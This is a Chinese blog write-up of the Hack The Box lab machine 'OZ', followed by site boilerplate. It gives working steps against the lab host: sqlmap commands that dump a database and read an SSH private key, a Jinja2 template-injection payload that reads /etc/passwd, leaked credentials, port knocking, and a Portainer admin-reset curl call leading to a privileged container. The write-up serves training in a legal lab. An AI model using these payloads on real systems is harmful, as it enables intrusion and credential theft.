【Hackthebox】【OZ】

最新推荐文章于 2024-06-08 17:21:42 发布
最新推荐文章于 2024-06-08 17:21:42 发布
阅读量1.5k 收藏 2
点赞数 2
分类专栏: HTB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/86515113
版权

 这次靶机是Hackthebox里面的OZ

=========================================================================================

信息的收集

 

nmap -sV -sC -T5 -p- 10.10.10.96

 

这里我们看到开放了2个端口80和8080.

他们都是Werkzeug的实例

Werkzeug是一个用于Python的WSGI(Web服务器网关接口)实用程序库,其功能之一是将HTTP请求映射到要调用的代码。

 

我们访问下网页

他提示我们需要注册一个用户名

 

我们在访问下8080

 

我在github上找到一个关于Werkzeug应用程序命令执行的仓库

https://github.com/Fare9/PyWerkzeug-Debug-Command-Execution/

但是发现目标关闭了调试模式 

 

尝试爆破下目录这里我用dirsearch

项目地址:https://github.com/maurosoria/dirsearch

 

扫描也没有扫描处什么有用的信息

扫描结果一大堆。

后来我发现 这个网站是不会返回404的 ,而是回返回给你一段随机值

所以我们这样的话很难爆破出结果的 因为返回的内容都是200

我们获取下这个网站还有什么方法可以用

curl -i -X OPTIONS http://10.10.10.96

我们访问的是主页面,发现放回的是200 内容长度为0那么我们可以用这个方法来判断枚举目录

 

所以我们换wfuzz   来爆破,然后筛选结果 返回的内容长度为0的页面

wfuzz -u http://10.10.10.96/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hl 0

我们可以发现有一个users目录访问下看看

还是这个样子。

但是这个路径是个有效的路径,我么试着在后面加一下常见的路径名比如:admin

 

我们就会得到响应username:"admin"

那我们试下其他错误的数据

 

提示错误。

我们再试下' or '1'='1

说明可能存在SQL注入

 

我们试着用SQLMAP跑下

 

sqlmap -u "http://10.10.10.96/users/"  --dbs

sqlmap -u "http://10.10.10.96/users/"  --tables -D ozdb

sqlmap -u "http://10.10.10.96/users/" --columns  -T users_gbw -D ozdb

sqlmap -u "http://10.10.10.96/users/" --dump -C id,username,password  -T users_gbw -D ozdb

 

我们把文件转存下用john来破解下Hash

唯一可以破解的就是wizard.oz: wizardofoz22

我们到http://10.10.10.96:8080登陆下

 

我们用sqlmap读取目标系统里面的文件,把私钥抓出来

sqlmap -u "http://10.10.10.96/users/" --file-read=/home/dorthi/.ssh/id_rsa --batch

 

cat /root/.sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa

 

现在有了私钥,但是我们目标机器只开启了80和8080

 

我们登陆下网站,添加下新的密钥信息

通过在burp中捕获该请求,我们将看到一个带有两个参数name和desc的POST请求。

 

 

然后我们输入{{7*’7'}},它返回7777777而不是49.

 

 

获取passwd内容

{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

在Jinja2模板中,有几个全局变量,例如config。

 

{{config}}

 config全局变量的输出显示以下凭据。

MYSQL + pymysql:// dorthi:N0Pl4c3L1keH0me@10.100.10.4/ozdb

检索配置项将向我们显示一些函数和变量。

{{config.items()}}

 

命令执行

RUNCMD引起了我的注意,因为它可以用来执行命令执行。使用下面的有效负载,我能够检索id机器。

 在那之后,我继续挖掘机器内部以发现更多有趣的文件,并找到了一些凭据。

 

密码= SuP3rS3cr3tP @ ss 
用户= dorthi 
密码= N0Pl4c3L1keH0me

该文件还提到了SSH,所以我认为两个发现的密码中的一个可用于在SSH中进行身份验证?嗯,我们稍后会看到。

然后,我发现了一个有趣的目录  .secret

 

在目录中,knockd.conf检索了一个名为的文件,并检查该文件的内容是否返回UDP端口的配置。这些端口可用于执行端口敲击以打开SSH服务。(所以我们可以使用上面的凭证)

 

 

 

使用名为knock的python工具,我能够打开机器的SSH服务并进行身份验证

https://github.com/grongor/knock

./knock 10.10.10.96 -u 40809 50212 46949 && ssh -i id_rsa dorthi@10.10.10.96 
Passphase:N0Pl4c3L1keH0me

成功通过身份验证后,我现在可以轻松阅读user.txt的内容。 

 

Portainer

https://github.com/portainer/portainer

简单的执行sudo -l表明我们可以inspectlistdocker网络。

执行sudo /usr/bin/docker network ls显示4个docker网络。

检查第一个docker网络会显示一个有趣的容器。

 

IP地址172.17.0.2被指定为Portainer实例,它是用于管理Docker的UI。

 

使用不同的端口敲击工具,我执行了ssh动态端口转发以连接到portainer。

./knock_udp.sh&& ssh -D 9000 -i id_rsa dorthi@10.10.10.96

然后我将我的SOCKS代理设置为Host: 127.0.0.1Port:9000

导航到http://172.17.0.2:9000/,将使用新的登录页面向我们致意,但是我尝试的大多数常见凭据都不成功。似乎Portainer在安装时提示设置管理员密码,而不是使用默认凭据。

检查Portainer GitHub库问题之后,我找到了一个答案Dilshan拉贾帕克萨

 

 

执行下面的简单cURL命令将重置admin的密码。

curl -H“Content-Type:application / json”http://172.17.0.2:9000/api/users/admin/init -d'{“password”:“letmein”}'

然后,我执行以下步骤来读取root.txt。

 


1.转到图像选项卡,单击未使用的图像并复制整个哈希
2.添加容器
3.设置容器名称
4.将哈希粘贴到图像字段中
5.选择交互式TTY 
6.在第
7 卷中选择“路径” 。设置“容器“as / mnt / anything 
8.安全/主机和检查特权模式
9.创建
10.连接到控制台并获取标志。</span>

root-flag:abaa95422109fa5f84d837fe1914af29 

大方子
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 629
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
OZ9350 设计规格书
12-11
OZ9350 设计规格书 OZ9350 设计规格书是 O2Micro 公司发布的一份详细的规格书,用于描述 OZ9350 芯片的设计规格和技术参数。本规格书涵盖了 OZ9350 的功能、应用、引脚配置、引脚描述、参考原理图、绝对最大额定值...
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3153
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1460
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
HackTheBox(黑客盒子)基础模块速通Responder篇
最新发布
轻舟已过万重山
06-08 1243
Responder是HackTheBox平台上的一个基础模块,用于嗅探网络中的NTLMv1/v2认证请求,并进行中间人攻击。本篇文章将介绍Responder的基本用法和一些常用技巧。
《Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1582
《Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
OZ8952 设计规格书
12-13
OZ8952 设计规格书 OZ8952 是一款高度集成、低成本的电池组保护和监控IC,专门设计用于管理3~4节Li-Ion/Polymer电池组,适用于电动工具、笔记本电脑、UPS等应用场景。下面是OZ8952的关键特性和技术参数: 1. 高...
OZ8957 规格书和资料
12-11
OZ8957规格书与资料解析》 在电子工程领域,规格书和相关技术文档是理解和应用元器件的基础。"OZ8957 规格书和资料"是一个专门针对OZ8957元器件的资料集合,包含两份重要的文档:OZ8957_DS_V1.1_171112.pdf和OZ...
OZ8920 设计规格书
12-13
OZ8920 设计规格书 OZ8920 设计规格书是 O2Micro 公司开发的一款 Battery Pack Protection and Monitor IC,旨在为 Li-ion 电池提供综合保护和监控功能。本设计规格书详细介绍了 OZ8920 的功能特性、工作原理、 pin...
OZ8930设计规格书
12-13
OZ8930设计规格书》详细解读 OZ8930是一款由O2Micro公司开发的集成电路,其设计规格书包含了该芯片的关键技术特性、功能更新及改动历史,以下是根据提供的内容对这款产品的主要知识点进行的详细解析: 1. **电压...
生命在于折腾——HackTheBox入门
易水哲的博客
01-12 1491
HackTheBox入门教程
连接hack the box教程
热门推荐
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
hack the box archetype靶场
qq_42754807的博客
05-28 800
hack the box archetype
hackthebox 001 获取邀请码
kevinhanser
12-02 4965
本文记录 backthebox 学习使用和渗透测试的详细过程 简介 破解邀请码 ###1. 简介### 常听别人说练习渗透测试可以使用 backthebox 这个在线的实验室,然后很容易地找到了官网,但是主页没有登录的入口。 终于在页面的中间部分找到了 Jion HTB 按钮入口 之后就进入了邀请页面 看到需要邀请码,下面问题来了,邀请码从哪里弄到呢 ###2. 破解邀...
hackthebox的邀请码获取(详细步骤!!!)
初学者L_言的博客
06-15 4493
一、背景 在一个安全交流群里,有位同学发出这样一个链接给我 https://www.hackthebox.eu/invite 页面提示如果能 Hack 进去,那么就能获取邀请码! 二、操作步骤 如果你只是想拿这个邀请码,那就直接这样: 1、访问:https://www.hackthebox.eu/invite 2、在控制台输入$.post('https://www.hackthebox.eu/api/invite/generate',function(data){console.log(data)})
HackTheBox-Cap
qq_39966991的博客
07-19 789
从这篇文章开始记录自己OSCP旅程,先从做靶机开始。主要是在hackthebox中做靶机,用kali连接vpn就能直接开始,不用再下载镜像文件。 hackthebox官网:https://app.hackthebox.eu/home 开始连接VPN 连接VPN后添加主机本次攻击的目标IP为10.10.10.245名为Cap的机子,操作系统是Linux 打开网站10.10.10.245后有发现Security ...每次刷新后URL都会在后面加1,并且最下角有一个下载按钮。 下载数据包再用.
Hackthebox------Jerry
大方子
11-24 3039
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Hack the box靶机 Arctic
菜浪马废的博客
06-03 372
找到后台登录地址 coldfusion 8 搜索漏洞 找到可以上传的地方 需要payload 使用MS10-059 https://github.com/Re4son/Chimichurri 完成
OZ9355 设计规格书
12-11
"OZ9355 设计规格书" OZ9355是一款由O2Micro公司设计的集成电路,其详细规格书涵盖了多个关键的技术特性、应用领域以及操作指南。该文档版本为OZ9355_DS_V1.0,发布日期为2014年4月8日,且标明了受版权保护和保密性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值